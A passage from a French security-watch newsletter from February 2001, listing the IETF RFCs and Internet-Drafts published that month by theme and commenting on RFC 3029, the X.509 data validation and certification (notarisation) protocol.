PUBLICATIONS DE L'IETF RFC Du 27/01/2001 au 23/02/2001, 13 RFC ont été publiés dont 3 RFC ayant trait à la sécurité. RFC TRAITANT DE LA SÉCURITÉ Thème CMD LDAP PKI Num Date Etat Titre 3058 3062 3029 02/01 Inf 02/01 Pst 02/01 Exp Use of the IDEA Encryption Algorithm in CMS LDAP Password Modify Extended Operation Internet X.509 Public Key Infrastructure Data Validation and Certification Server Protocols RFC TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ Thème POLICY Num Date Etat Titre 3060 02/01 Pst Policy Core Information Model -- Version 1 Specification AUTRES RFC Thème BGP DNS IP MGCP MOBILEIP MPLS PINT SLP URN LES Num Date Etat Titre 3065 3071 3056 3064 3025 3063 3055 3059 3061 02/01 02/01 02/01 02/01 02/01 02/01 02/01 02/01 02/01 Pst Inf Pst Inf Pst Exp Pst Pst Inf Autonomous System Confederations for BGP Reflections on the DNS, RFC 1591, and Categories of Domains Connection of IPv6 Domains via IPv4 Clouds MGCP CAS Packages Mobile IP Vendor/Organization-Specific Extensions MPLS Loop Prevention Mechanism Management Information Base for the PINT Services Architecture Attribute List Extension for the Service Location Protocol A URN Namespace of Object Identifiers DRAFTS Du 27/01/2001 au 23/02/2001, 288 drafts ont été publiés: 162 drafts mis à jour, 126 nouveaux drafts, dont 39 drafts ayant directement trait à la sécurité. NOUVEAUX DRAFTS TRAITANT DE LA SÉCURITÉ Thème Nom du Draft Date Titre DIAMETER HTTP ICMPV6 IDWG IPSEC LDAPBIS RFC2868 SECSH SIP SMPLS SSH STATE draft-kaushik-diameter-strong-sec-00 draft-nystrom-http-sasl-00 draft-arkko-icmpv6-ike-effects-00 draft-ietf-idwg-beep-idxp-00 draft-ietf-ipsec-sctp-00 draft-ietf-ldapbis-authmeth-00 draft-zorn-rfc2868bis-00 draft-ietf-secsh-dh-group-exchange-00 draft-kroeselberg-sip-3g-security-req-00 draft-tsenevir-smpls-doi-00 draft-griffin-ssh-host-keys-in-dns-00 draft-lewis-state-of-dnssec-00 21/02 21/02 09/02 20/02 19/02 21/02 12/02 30/01 29/01 20/02 01/02 02/02 DIAMETER Strong Security Extension using Kerberos v5 SASL in http/1.1 Effects of ICMPv6 on IKE and IPsec Policies The Intrusion Detection Exchange Protocol (IDXP) On the Use of SCTP with IPsec Authentication Methods for LDAPv3 RADIUS Attributes for Tunnel Protocol Support Diffie-Hellman Group Exchange for SSH Transport Layer Protocol SIP security requirements from 3G wireless networks Secure MPLS Domain of Interpretation for ISAKMP Storing SSH Host Keys in DNS Notes from the State-Of-The-Technology: DNSSEC MISE À JOUR DE DRAFTS TRAITANT DE LA SÉCURITÉ Thème Nom du Draft Date Titre CAT DHC DIAMETE DNSEXT draft-burdis-cat-srp-sasl-04 draft-ietf-dhc-authentication-16 draft-calhoun-diameter-strong-crypto-06 draft-ietf-dnsext-message-size-03 draft-ietf-dnsext-zone-status-05 29/01 31/01 05/02 29/01 13/02 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Secure Remote Password SASL Mechanism Authentication for DHCP Messages DIAMETER Strong Security Extension DNSSEC & IPv6 A6 aware server/resolver msg. size requirements DNS Security Extension Clarification on Zone Status Page 14/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 IDWG IPSEC ISCSI KINK L2TPEXT LDAP MOBILEI OPENPGP PKIX PPPEXT PROBABI RADIUS SACRED SMIME SMPLS TLS UGGC draft-ietf-idwg-idmef-xml-03 draft-ietf-idwg-requirements-05 draft-ietf-ipsec-ike-monitor-mib-02 draft-ietf-ipsec-isakmp-di-mon-mib-03 draft-ietf-ipsec-monitor-mib-04 draft-klein-iscsi-security-01 draft-ietf-kink-reqmt-01 draft-ietf-l2tpext-security-02 draft-zeilenga-ldap-authpasswd-05 draft-ietf-mobileip-aaa-key-03 draft-ietf-openpgp-mime-04 draft-ietf-openpgp-multsig-02 draft-ietf-pkix-new-part1-04 draft-aboba-pppext-eapgss-03 draft-selcuk-probabilistic-lkh-01 draft-congdon-radius-8021x-09 draft-ietf-sacred-reqs-01 draft-ietf-smime-domsec-08 draft-ietf-smime-rcek-01 draft-tsenevir-smpls-01 draft-ietf-tls-ciphersuite-03 draft-farah-uggc-protocol-01 14/02 20/02 13/02 13/02 13/02 15/02 31/01 12/02 07/02 29/01 08/02 30/01 07/02 13/02 30/01 02/02 14/02 01/02 08/02 20/02 01/02 31/01 Intrusion Detection Message Exchange Format XML Doc. Typ Def. Intrusion Detection Mesage Exchange Requirements IKE Monitoring MIB ISAKMP DOI-Independent Monitoring MIB IPSec Monitoring MIB iSCSI Security Protocol Kerberized Internet Negotiation of Keys Securing L2TP using IPSEC LDAP Authentication Password Schema AAA Registration Keys for Mobile IP MIME Security with OpenPGP Multiple Signatures using Security Multiparts Internet X.509 PKI Certificate and CRL Profile EAP GSS Authentication Protocol Prob. Opt. of LKH-based Multicast Key Distribution Schemes IEEE 802.1X RADIUS Usage Guidelines Securely Available Credentials - Requirements Domain Security Services using S/MIME Reuse of CMS Content Encryption Keys Secure MPLS - Encryption and Authentication of MPLS payloads AES Ciphersuites for TLS Encrypted Hypertext Transfer Protocol -- UGGC/1.0 DRAFTS TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ Thème Nom du Draft AAA draft-ietf-aaa-diameter-00 draft-ietf-aaa-diameter-accounting-00 draft-ietf-aaa-diameter-framework-00 draft-ietf-aaa-diameter-impl-guide-00 draft-ietf-aaa-diameter-mobileip-00 draft-ietf-aaa-diameter-nasreq-00 BEEP draft-mrose-beep-design-02 BGPCON draft-berkowitz-bgpcon-00 CARD draft-eastlake-card-map-08 DIAMETER draft-calhoun-diameter-18 draft-calhoun-diameter-accounting-09 draft-calhoun-diameter-framework-09 draft-calhoun-diameter-impl-guide-05 draft-calhoun-diameter-mobileip-12 draft-calhoun-diameter-nasreq-06 draft-calhoun-diameter-res-mgmt-07 draft-calhoun-diameter-sun-ping-00 IDWG draft-ietf-idwg-beep-tunnel-01 draft-ietf-idwg-iap-04 IPVPN draft-iyer-ipvpn-infomodel-00 draft-iyer-ipvpn-infomodel-req-00 LDAP draft-armijo-ldap-control-error-01 draft-zeilenga-ldap-cancel-01 draft-zeilenga-ldap-namedref-02 draft-zeilenga-ldap-root-02 draft-zeilenga-ldap-txn-01 LDAPBIS draft-ietf-ldapbis-filter-00 LDAPEXT draft-ietf-ldapext-ldap-java-api-13 draft-khan-ldapext-replica-mgmt-00 LDAPV3B draft-zeilenga-ldapv3bis-opattrs-04 NATREQ4 draft-huitema-natreq4ipv6-00 draft-huitema-natreq4udp-00 PERSONA draft-bryden-personal-content-tunnels-00 PPVPN draft-hummel-ppvpn-tunnel-systems-00 SYSLOG draft-ietf-syslog-reliable-04 draft-ietf-syslog-syslog-05 TRADE draft-ietf-trade-ecml2-req-00 UDLR draft-ietf-udlr-lltunnel-06 UMTP draft-finlayson-umtp-05 Date Titre 09/02 09/02 09/02 09/02 09/02 09/02 20/02 29/01 15/02 05/02 05/02 05/02 05/02 05/02 05/02 05/02 07/02 19/02 20/02 19/02 19/02 08/02 07/02 07/02 12/02 12/02 21/02 05/02 30/01 07/02 19/02 19/02 15/02 13/02 08/02 16/02 14/02 08/02 21/02 Diameter Base Protocol Diameter Accounting Extensions Diameter Framework Document Diameter Implementation Guidelines Diameter Mobile IP Extensions Diameter NASREQ Extensions On the Design of Application Protocols Benchmarking Methodology for Exterior Routing Convergence ISO 7812/7816 Numbers and the Domain Name System (DNS) DIAMETER Base Protocol DIAMETER Accounting Extension DIAMETER Framework Document DIAMETER Implementation Guidelines DIAMETER Mobile IP Extensions DIAMETER NASREQ Extensions DIAMETER Resource Management Extensions Diameter Sun Ping Extensions The TUNNEL Profile Registration IAP: Intrusion Alert Protocol IP VPN Policy Information Model Requirements for an IP VPN Policy Information Model Result Message for LDAP Controls LDAP Cancel Extended Operation Named Subordinate References in LDAP Directories OpenLDAP Root Service An experimental LDAP referral service LDAPv3 Transactions The String Representation of LDAP Search Filters The Java LDAP Application Program Interface LDAP Extensions for Managing Replication Context and Replicas LDAPv3: All Operational Attributes Short term NAT requirements for IPv6 transition Short term NAT req. for UDP based peer-to-peer applications Personal Content Tunnels Tree/Ring/Meshy VPN tunnel systems Reliable Delivery for Syslog syslog Protocol Electronic Commerce Modeling Language: V2 Requirements A Link Layer Tunneling Mechanism for Unidirectional Links The UDP Multicast Tunneling Protocol AUTRES DRAFTS Thème Nom du Draft Date Titre 3GPP2 ADSLMIB APEX draft-bradner-3gpp2-collaboration-00 draft-baillie-adslmib-vdsldmt-00 draft-mrose-apex-access-01 draft-mrose-apex-core-02 draft-mrose-apex-presence-02 draft-ietf-atommib-atm2-16 19/02 19/02 13/02 20/02 20/02 13/02 ATOMMIB Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 3GPP2-IETF Standardization Collaboration Definitions of Managed Objects for VDSL DMT Lines The APEX Access Service The Application Exchange Core The APEX Presence Service Definitions of Supplemental Managed Objects for ATM Interface Page 15/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 draft-stewart-atommib-opticalmib-01 draft-akers-atwal-btooth-00 draft-gentric-avt-mpeg4-multisl-01 draft-ietf-avt-evrc-01 draft-ietf-avt-profile-interop-04 draft-ietf-avt-rtp-amr-04 draft-ietf-avt-rtp-interop-06 draft-ietf-avt-rtp-mp3-06 BGP draft-chen-bgp-reference-01 BST draft-azmak-bst-00 BURP draft-das-burp-requirements-00 CALSCH draft-ietf-calsch-inetcal-guide-00 CDI draft-amini-cdi-distribution-reqs-00 CDNP draft-cain-cdnp-known-request-routing-01 draft-penno-cdnp-nacct-userid-02 CONFORM draft-hss-conformance-test-sctp-00 DELTAV draft-ietf-deltav-versioning-13 DHC draft-aiello-dhc-appliance-class-00 draft-ietf-dhc-agentoptions-device-class-01 draft-ietf-dhc-leasequery-01 DIFFSER draft-bless-diffserv-le-phb-00 draft-ietf-diffserv-2836bis-01 draft-ietf-diffserv-mib-08 draft-ietf-diffserv-model-06 draft-ietf-diffserv-pdb-ar-00 draft-ietf-diffserv-rfc2598bis-00 DISMAN draft-bierman-disman-see-00 draft-ietf-disman-alarm-mib-00 draft-ietf-disman-itualarm-mib-00 DNS draft-schoch-dns-ssm-00 DNSEXT draft-macgowan-dnsext-label-intel-manage-0 DNSOP draft-ietf-dnsop-hardie-shared-root-server-03 DSUA draft-manning-dsua-06 E164 draft-foster-e164-gstn-npusa-01 ENUM draft-ietf-enum-e164-gstn-np-01 FAST draft-designteam-fast-mipv6-01 FAX draft-ietf-fax-content-negotiation-04 draft-ietf-fax-gateway-options-01 draft-ietf-fax-gateway-protocol-03 draft-ietf-fax-implementers-guide-06 draft-ietf-fax-service-v2-02 draft-ietf-fax-timely-delivery-02 FAXWG draft-maeda-faxwg-fax-processing-status-00 draft-maeda-faxwg-terminal-mode-goals-00 draft-maeda-faxwg-terminal-mode-protocol-0 FCIP draft-weber-fcip-encaps-00 GLOP draft-meyer-glop-extensions-00 GNUQUEU draft-krebs-gnuqueue-protocol-01 GRP draft-giacalone-grp-00 HTML draft-daviel-html-geo-tag-04 IANA draft-albanna-iana-IPv4-mcast-guidelines-00 IDMR draft-ietf-idmr-snoop-00 IDN draft-ietf-idn-amc-ace-m-00 draft-ietf-idn-dnsii-mdnp-02 draft-ietf-idn-dnsii-mdnr-01 draft-ietf-idn-mua-00 IDR draft-ietf-idr-as4bytes-01 IMAP draft-crispin-imap-multiappend-03 draft-nerenberg-imap-binary-02 IMPP draft-ietf-impp-cpim-msgfmt-00 INARP draft-heinanen-inarp-uni-00 IPCDN draft-ietf-ipcdn-dvbnetint-mib-03 draft-ietf-ipcdn-dvbniuif-mib-00 IPNGWG draft-haberman-ipngwg-host-anycast-00 draft-ietf-ipngwg-1394-01 draft-ietf-ipngwg-addr-arch-v3-04 draft-ietf-ipngwg-rfc2553bis-03 draft-ietf-ipngwg-site-prefixes-05 IPP draft-ietf-ipp-collection-04 draft-ietf-ipp-implementers-guide-v11-02 draft-ietf-ipp-job-printer-set-ops-03 draft-ietf-ipp-job-prog-02 draft-ietf-ipp-not-05 draft-ietf-ipp-not-spec-06 draft-ietf-ipp-url-scheme-02 IPPM draft-ietf-ippm-ipdv-06 draft-ietf-ippm-owdp-02 ATWAL AVT Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 30/01 21/02 05/02 20/02 07/02 19/02 07/02 12/02 15/02 16/02 29/01 19/02 20/02 13/02 08/02 12/02 15/02 13/02 05/02 15/02 21/02 20/02 15/02 07/02 15/02 19/02 15/02 30/01 30/01 12/02 08/02 08/02 01/02 13/02 09/02 08/02 30/01 21/02 21/02 13/02 15/02 09/02 20/02 16/02 16/02 13/02 20/02 29/01 16/02 15/02 12/02 21/02 12/02 07/02 07/02 08/02 13/02 21/02 14/02 12/02 08/02 07/02 14/02 19/02 14/02 05/02 12/02 08/02 29/01 05/02 01/02 29/01 29/01 05/02 14/02 21/02 21/02 Definitions of Managed Objects for the Optical Interface Type Transmission of IP Packets over Bluetooth Networks RTP Payload Format for MPEG-4 Streams An RTP Payload Format for EVRC Speech RTP Audio/Video Profile Interoperability Statement RTP payload format for AMR RTP Interoperability Statement A More Loss-Tolerant RTP Payload Format for MP3 Audio List of the Current BGP Documents BST Protocol for Improved Perf. in Satellite, Wireless & Mobile Net Basic User Registration Protocol (BURP) Requirements Guide to Internet Calendaring Dist. Peer. Requirements for Content Distribution Internetworking Known CDN Request-Routing Mechanisms User Profile Information Protocol Conformance Test Specification for SCTP Versioning Extensions to WebDAV Appliance Class Identifier Option for DHCP Addition of Device Class to Agent Options DHCP Lease Query A Limited Effort Per-Hop Behavior Per Hop Behavior Identification Codes Mgmt. Information Base for the Diff. Services Architecture An Informal Management Model for Diffserv Routers An Assured Rate Per-Domain Behaviour for Differentiated Services An Expedited Forwarding PHB Script Execution Env. Specification For Dist. Mng. Platforms Alarm MIB ITU Alarm MIB Using Domain Name Services for Source Specific Multicast DNS Label Intelligence and Management System Dist. Root or Autho. Name Servers via Shared Unicast Addresses Documenting Special Use IPv4 Address Blocks Number Portability Administration in the U.S. Number Portability in the GSTN: An Overview Fast Handovers for Mobile IPv6 Content Negotiation for Internet Messaging Services Guideline of optional services for Internet FAX Gateway Internet FAX Gateway Protocol Implementers Guide for Facsimile Using Internet Mail A Simple Mode of Facsimile Using Internet Mail Timely Delivery for Internet Messaging Services Fax Processing Status Goals for Terminal Mode Protocol for Terminal Mode FCIP Frame Encapsulation Enhancement Proposals Extended Allocations in 233/8 Desc. of Load-Balancing & Comm. Protocols Used by GNU Queue GRP for Networks Using Zero Configuration IPv4 Addresses Geographic registration of HTML documents IANA Guidelines for IPv4 Multicast Address Allocation IGMPv3 and IGMP Snooping switches AMC-ACE-M version 0.1.0 The DNSII Multilingual Domain Name Protocol DNSII Multilingual Domain Name Resolution Internationalizing Domain Names in Mail User Agents BGP support for four-octet AS number space IMAP - MULTIAPPEND EXTENSION IMAP4 Binary Content Extension Common Presence and Instant Messaging Message Format Inverse ARP over Unidirectional Virtual Circuits DVB Cable Network Interface Unit MIB for EuroModem Cable Mod. DVB NIU Interface MIB for EuroModem compliant Cable Modems Host-based Anycast using MLD Transmission of IPv6 Packets over IEEE 1394 Networks IP Version 6 Addressing Architecture Basic Socket Interface Extensions for IPv6 Site prefixes in Neighbor Discovery Internet Printing Protocol (IPP): The 'collection' attribute syntax Internet Printing Protocol/1.1: Implementer's Guide Internet Printing Protocol (IPP): Job and Printer Set Operations Internet Printing Protocol (IPP): Job Progress Attributes Internet Printing Protocol: Requirements for IPP Notifications Internet Printing Protocol (IPP):IPP Event Notification Specification Internet Printing Protocol (IPP): IPP URL Scheme IP Packet Delay Variation Metric for IPPM A One-way Delay Measurement Protocol Page 16/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 IPS IPTEL IPV6 ISIS draft-ietf-ips-ifcp-00 draft-gurbani-iptel-sip-to-in-04 draft-iesg-ipv6-addressing-recommendationsdraft-ietf-isis-diff-te-00 draft-ietf-isis-transient-00 ISSLL draft-hamid-issll-rsvp-cap-dsmark-00 draft-ietf-issll-rsvp-cap-02 L2CIRCU draft-martini-l2circuit-encap-mpls-01 draft-martini-l2circuit-trans-mpls-05 L2TPEXT draft-ietf-l2tpext-link-01 draft-ietf-l2tpext-ppp-discinfo-02 draft-ietf-l2tpext-sesinfo-03 LDAPBIS draft-zeilenga-ldapbis-vd-01 LMTP draft-murchison-lmtp-ignorequota-00 LOW draft-fukunaga-low-delay-rtcp-02 MANET draft-ietf-manet-zone-brp-00 draft-ietf-manet-zone-iarp-00 draft-ietf-manet-zone-ierp-00 MANUAL draft-arkko-manual-icmpv6-sas-00 MBONED draft-ietf-mboned-ssm232-00 MEGACO draft-bothwell-megaco-mftonepkgs-00 draft-boyle-megaco-tonepkgs-02 draft-cutler-megaco-mgc-cookie-00 draft-doyle-megaco-tonesmib-00 draft-manyfolks-megaco-caspackage-00 draft-rosen-megaco-atm-package-00 METRIC draft-jaffer-metric-interchange-format-03 METRICS draft-bradner-metricstest-00 MGCP draft-srinath-mgcp-bus-packages-01 MHTML draft-palme-mhtml-info-00 MIDCOM draft-ietf-midcom-framework-00 MIDDLEB draft-lear-middlebox-arch-01 MIDTAX draft-carpenter-midtax-00 MMUSIC draft-andreasen-mmusic-sdp-simcap-reqts-00 draft-ietf-mmusic-sdp-atm-05 draft-ietf-mmusic-sdp-comedia-00 draft-ietf-mmusic-sdpng-req-00 MORNEAU draft-jimenez-morneault-iua-test-spec-00 MPLS draft-ietf-mpls-diff-ext-08 draft-ietf-mpls-diff-te-ext-01 draft-ietf-mpls-generalized-signaling-01 NBN draft-hakala-nbn-01 NDMPV4 draft-skardal-ndmpv4-01 NEW draft-farah-new-keywords-02 NGTRANS draft-ietf-ngtrans-6to4anycast-02 draft-ietf-ngtrans-6to4-multicast-00 draft-ietf-ngtrans-dstm-04 draft-ietf-ngtrans-tcpudp-relay-02 OCF draft-bullen-ocf-00 ONG draft-stewart-ong-sctpbakeoff-sigtran-01 OPCODE draft-ymbk-opcode-discover-00 OSPF draft-ietf-ospf-diff-te-00 draft-ietf-ospf-hitless-restart-00 draft-ietf-ospf-subset-flood-00 PAGING draft-seamoby-paging-problem-statement-01 PCDP draft-jl-pcdp-01 PEEK draft-ranalli-peek-walter-enum-t1roles-01 PGM draft-speakman-pgm-spec-06 PICO draft-odoherty-pico-sip-00 PPPOE draft-penno-pppoe-ext-service-00 PROVREG draft-ietf-provreg-dn-defn-00 draft-ietf-provreg-epp-00 draft-ietf-provreg-grrp-reqs-00 REQUIR draft-calabrese-requir-logprot-04 RESTORA draft-bala-restoration-signaling-00 RFC1403 draft-meyer-rfc1403-historic-00 RFC1745 draft-meyer-rfc1745-historic-00 RMONMIB draft-ietf-rmonmib-dsmon-mib-04 draft-ietf-rmonmib-iftopn-mib-04 RMT draft-koh-rmt-bb-tsm-00 ROHC draft-ietf-rohc-rtp-08 draft-ietf-rohc-rtp-lower-layer-guidelines-01 draft-ietf-rohc-rtp-requirements-05 ROOT draft-higgs-root-defs-00 RPC draft-smajee-rpc-ipv6-00 SACRED draft-ietf-sacred-scenarios-00 SEAMOBY draft-ietf-seamoby-context-transfer-problem-s Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 21/02 19/02 02/02 20/02 20/02 20/02 21/02 19/02 12/02 20/02 20/02 20/02 07/02 14/02 13/02 21/02 21/02 21/02 09/02 12/02 05/02 14/02 12/02 19/02 05/02 12/02 19/02 21/02 12/02 12/02 21/02 01/02 30/01 07/02 02/02 19/02 19/02 08/02 16/02 19/02 19/02 30/01 14/02 31/01 21/02 15/02 14/02 16/02 08/02 31/01 30/01 19/02 20/02 21/02 15/02 12/02 05/02 14/02 30/01 20/02 20/02 21/02 21/02 07/02 20/02 09/02 09/02 29/01 08/02 21/02 08/02 08/02 09/02 19/02 16/02 13/02 19/02 iFCP - A Protocol for Internet Fibre Channel Storage Networking Accessing IN services from SIP networks IAB/IESG Recommendations on IPv6 Address Allocations Extensions to ISIS for support of Diff-Serv-aware MPLS Traffic IS-IS Transient Blackhole Avoidance A Usage Case for the RSVP CAP Object Capability Negotiation: The RSVP CAP Object Encapsulation Methods for Transport of Layer 2 Frames ov. MPLS Transport of Layer 2 Frames Over MPLS L2TP Link Extensions L2TP Disconnect Cause Information L2TP Session Information (``SESINFO'') Lightweight Directory Access Protocol: version differences LMTP Service Extension for Ignoring Recipient Quotas Low Delay RTCP Feedback Format The Bordercast Resolution Protocol (BRP) for Ad Hoc Networks The Intrazone Routing Protocol (IARP) for Ad Hoc Networks The Interzone Routing Protocol (IERP) for Ad Hoc Networks Manual SA Configuration for IPv6 Link Local Messages Source-Specific Protocol Independent Multicast in 232/8 MF Tone Generation and Detection Packages Supplemental Tones Packages for Megaco/H.248 MGC Cookie Package for Megaco/H248 Tones MIB for Megaco/H.248 Megaco/H.248 Basic CAS Packages Megaco ATM Package Repres. of numerical values & SI units in character strings for inf. Adv. of metrics specifications on the IETF Standards Track MGCP Business Phone Packages Sending HTML in MIME, an informational supplement to the RFC Middlebox Communication Architecture and framework A Middle Box Architectural Framework Middle boxes: taxonomy and issues SDP Simple Capability Negotiation Requirements Conventions for the use of the Session Description Protocol … Connection-Oriented Media Transport in SDP Requirements for Session Description and Capability Negotiation ISDN Q.921-User Adaptation Layer Test Specification MPLS Support of Differentiated Services Extensions to RSVP-TE and CR-LDP for support of Diff-Serv-aware Generalized MPLS - Signaling Functional Description Using National Bibliography Numbers as Uniform Resource Names NDMP Version 4 Protocol New meaning of Keywords for use in RFCs to Ind. Req. Levels An anycast prefix for 6to4 relay routers Support for Multicast over 6to4 Networks Dual Stack Transition Mechanism (DSTM) An IPv6-to-IPv4 transport relay translator Open Capture Format (OCF) SCTP Bakeoff Results and Issues The DISCOVER opcode Extensions to OSPF for support of Diff-Serv-aware MPLS Traffic E. Hitless OSPF Restart Flooding Over a Subset Topology Paging Problem Statement Propagated Content Delivery Protocol Tier-1 ENUM System Roles and Responsibilities PGM Reliable Transport Protocol Pico SIP PPPoE Extensions For Seamless Service Selection Domain Name and Related Definitions Extensible Provisioning Protocol Generic Registry-Registrar Protocol Requirements Requirements for a Network Event Logging Protocol Signaling for Fast Restoration in Optical Mesh Networks Request to Move RFC1403 to Historic Status Request to Move RFC1745 to Historic Status Remote Monitoring MIB Extensions for Differentiated Services Remote Monitoring MIB Ext. for Interface Parameters Monitoring Reliable Multicast Transport Building Blocks:Transport Session Ma. RObust Header Compression (ROHC) Lower Layer Guidelines for Robust RTP/UDP/IP Header Comp. Requirements for robust IP/UDP/RTP header compression Root Server Definitions IPv6 extension to RPC SACRED Scenarios Problem Description: Reasons For Doing Context Transfers Bet. Page 17/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 SGM SIGTRAN SIP SMING SONET SPIRITS SSM STD39 SVRLOC T TDMOIP TEL TEST TEWG TRADE UID UOL URI URN USWG VMI VPIM WEBDAV WEBI XCAST XHTML XMLORG draft-ietf-seamoby-mm-problem-00 draft-thomas-seamoby-rsvp-analysis-00 draft-boivie-sgm-02 draft-ietf-sigtran-addip-sctp-00 draft-ietf-sigtran-m2ua-07 draft-ietf-sigtran-relreq-sctp-00 draft-ietf-sigtran-srwnd-sctp-00 draft-ietf-sigtran-sua-05 draft-ietf-sigtran-usctp-01 draft-ietf-sigtran-v5ua-00 draft-campbell-sip-service-control-03 draft-ietf-sip-cc-transfer-03 draft-ietf-sip-serverfeatures-03 draft-mahy-sip-message-waiting-01 draft-peterbauer-sip-servlet-ext-00 draft-petrie-sip-config-framewk-reqs-00 draft-roach-sip-subscribe-notify-03 draft-ietf-sming-copspr-00 draft-malis-sonet-ces-mpls-02 draft-faynberg-spirits-reqs-00 draft-ietf-spirits-architecture-01 draft-ietf-spirits-reqs-00 draft-slutsman-spirits-architecture-02 draft-kim-ssm-hierarchical-scheme-00 draft-ymbk-std39-historic-01 draft-ietf-svrloc-ipv6-12 draft-itu-t-ieps-description-00 draft-anavi-tdmoip-00 draft-yu-tel-url-02 draft-hss-test-spec-m3ua-00 draft-ietf-tewg-diff-te-reqts-00 draft-ietf-trade-drt-requirements-02 draft-ietf-trade-voucher-lang-00 draft-penno-uid-01 draft-boynton-uol-03 draft-eastlake-uri-fqdn-param-00 draft-best-urn-oasis-02 draft-ietf-urn-ddds-04 draft-ietf-urn-dns-ddds-database-03 draft-ietf-urn-rfc2611bis-01 draft-ietf-urn-uri-res-ddds-03 draft-walsh-urn-publicid-00 draft-ietf-uswg-tao-03 draft-senevirathne-vmi-frame-00 draft-ietf-vpim-hint-03 draft-ietf-webdav-status-00 draft-ietf-webi-idd-reqs-00 draft-shin-xcast-receiver-join-00 draft-baker-xhtml-media-reg-01 draft-best-xmlorg-01 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 19/02 13/02 14/02 05/02 08/02 05/02 05/02 02/02 19/02 20/02 12/02 05/02 12/02 08/02 15/02 05/02 08/02 08/02 19/02 08/02 02/02 20/02 30/01 21/02 08/02 13/02 20/02 15/02 09/02 15/02 19/02 15/02 21/02 08/02 08/02 19/02 08/02 09/02 09/02 12/02 09/02 15/02 15/02 07/02 16/02 29/01 21/02 02/02 08/02 08/02 SeaMoby Micro Mobility Problem Statement Analysis of Mobile IP and RSVP Interactions Small Group Multicast SCTP Dynamic Addition of IP addresses SS7 MTP2-User Adaptation Layer Generic Method for Transmitting Reliable SCTP Control Chunks SCTP Stream based flow limiting methods SS7 SCCP-User Adaptation Layer (SUA) SCTP Unreliable Data Mode Extension V5.2-User Adaption Layer (V5UA) Control of Service Context using SIP Request-URI SIP Call Control The SIP Supported Header SIP Extensions for Message Waiting Indication SIP Servlet API Extensions Requirements for a SIP User Agent Configuration Framework Event Notification in SIP SMIng Mappings to COPS-PR SONET/SDH Circuit Emulation Service Over MPLS SPIRITS Protocol Requirements The SPIRITS Architecture SPIRITS Protocol Requirements The SPIRITS Architecture Hierarchical Scheme for Source-Specific Multicast Deployment Request to Move STD 39 to Historic Status Service Location Protocol Modifications for IPv6 Recommendation E.106 (Formerly CCITT Recommendation) TDM over IP Extensions to the 'tel' and 'fax' URLs to Support Number Portabil. Test Specification for MTP3 User Adaptation Requirements for support of Diff-Serv-aware MPLS Traffic Requirements for Generic Voucher Trading XML Voucher: Generic Voucher Language User Identification on the Internet Uniform Object Locator -- UOL Considerations for URI and FQDN Protocol Parameters A URN Namespace for OASIS oasis Dynamic Delegation Discovery System (DDDS) A DDDS Database Using The Domain Name System URN Namespace Definition Mechanisms URI Resolution using the Dynamic Delegation Discovery System A URN Namespace for Public Identifiers The Tao of IETF - A Novice's Guide to the Internet Engineering A Framework for Virtual Metropolitan Internetworks (VMI) Message Context for Internet Mail WebDAV -- Advanced Status Reporting Requirements for Intermediary Discovery and Description Explicit Multicast Extension Supporting Receiver Initiated Join The 'application/xhtml+xml' Media Type A URN Namespace for XML.org xmlorg Page 18/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 NOS COMMENTAIRES LES RFC RFC 3029 Internet X.509 Public Key Infrastructure Data Validation and Certification Server Protocols Ce standard IETF de 50 pages décrit une implémentation (objets ASN1 et protocole) de type 'TTP'* (Trusted Third Party) dénommé 'DVCS' ou 'Data Validation and Certification Server'. Un tel système permet d'assurer un service dit de 'non-répudiation' , voire de 'notarisation' permettant de prouver la possession d'une donnée numérique à la date mentionnée dans un certificat remis par le système, et ici dénommé DVC ou 'Data Validation Certificate'. Rappelons que les infrastructures de service 'TTP' ont fait l'objet de nombreuses études au début des années 90 et peuvent être implémentées selon deux modèles: Modèle du Tiers en Ligne: le tiers joue le rôle d'intermédiaire dans une transaction en apposant sa signature horodatée sur les données reçues, données elles-mêmes signées par l'émetteur. Cette signature (et selon le contexte, les données associées) est archivée puis transmise si nécessaire à l'émetteur et au(x) destinataire(s). Le service 'LettreRecommandée' présenté dans notre rapport de veille N°30 du mois de Janvier 2001 s'inscrit dans ce modèle. Ce modèle était celui retenu par le service de notarisation Veridial proposé par la société Transpac dans la fin des années 80. Modèle du Tiers hors Ligne: dans ce modèle, le tiers se place en dehors de la transaction et appose sa signature horodatée sur demande explicite du client. Ce modèle était celui retenu par le service de notarisation Cerdial proposé par la société Transpac au milieu des années 90. Ici, le RFC 3029 référence un modèle de type ' Tiers hors ligne ' pour lequel deux protocoles d'accès et de soumission, utilisant tous les deux l'objet MIME 'Content-Type application/dvcs', sont plus spécialement détaillés: Messagerie Internet via Smtp et WEB via HTTP/HTTPS. Ce document a pour particularité de s'inscrire, une fois n'est pas coutume, dans le courant de normalisation Européen: co-édité par 2 sociétés spécialisées dans les PKI (Entrust et Baltimore), par une société Française (OnX/EdelWeb), validé par l'un des spécialistes français de X509, Denis Pinkas (Bull) et référençant en annexe la norme ISO 10181-5 'SecurityFramework in Open Systems: Non-Repudation Framework'. D'un lecture ardue, ce RFC reste intéressant car traitant au niveau d'un standard Internet, donc avec une forte audience, une problématique quelque peu oubliée des grands fournisseurs de service et pourtant absolument nécessaire comme rappelée en 1999 dans le rapport Lorentz. * TTP: Terminologie traduite en 'Tiers de Confiance' à prendre au sens large du terme et non de celui, trop restrictif, usité en France à la suite de l'ouverture de la législation sur la Cryptographie. Ici, un TTP offre un service de délivrance, d'enregistrement de preuve, éventuellement de dépôt sécurisé, et non uniquement de conservation des clefs de chiffrement, fonction désignée outre-Atlantique sous la terminologie de 'Key Escrow'. ftp://ftp.isi.edu/in-notes/rfc3029.txt LES DRAFTS DRAFT-MANNING-DSUA-06 Documenting 